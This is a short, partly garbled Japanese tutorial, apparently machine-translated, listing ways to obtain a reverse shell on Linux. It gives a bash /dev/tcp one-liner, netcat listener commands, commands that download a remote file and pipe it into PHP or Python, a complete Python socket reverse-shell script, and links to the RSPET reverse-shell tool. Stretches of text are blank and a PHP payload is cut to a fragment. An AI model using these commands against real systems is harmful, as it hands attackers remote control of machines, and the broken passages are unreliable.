shellリバウンドのいくつかの方法

2113 ワード

0 x 01 linux上のbashを直接利用してリバウンド
nc    
nc -l -p port -vv
base  
bash -i >& /dev/tcp/ownip/port 0>&1
 
   
  
0x02              ,  php,python 。
 
  
nc    
nc -l -p port -vv
 
   
  
 
  
 
  
 
  
    php          ,       linux  ,   php         
linux    
     ip          ip     ,           test.txt    。
 
  
wget  
 
  
 
  
 
  
  wget      
wget http://localhost/test.txt -O /tmp/x.php && php /tmp/x.php 
test.txt  
 
  
 
  
&3 2>&3");
?>

Curl方式
  curl    
curl -sS http://localhost/test.py | python

test.pyファイル
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("localhost",12345)) #  localhost      ip,    
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])

これはテストに成功しなかった
0 x 03 pythonベースの逆接続shellツール
     
python RSPET_server.py (max_connections) 
     
python RSPET_client.py server_ip

サービス側ファイル
https://github.com/panagiks/RSPET/blob/master/Server/RSPET_server.py
https://raw.githubusercontent.com/panagiks/RSPET/master/Server/RSPET_server.py
クライアントファイル
https://github.com/panagiks/RSPET/blob/master/Client/RSPET_client.py
https://raw.githubusercontent.com/panagiks/RSPET/master/Client/RSPET_client.py
0 x 04その他のリバウンドshellメソッドは、以下の文書を参照してください.
参照先:
http://www.freebuf.com/sectool/105698.html
http://www.myhack58.com/Article/html/3/8/2014/48255.htm
http://www.waitalone.cn/linux-shell-rebound-under-way.html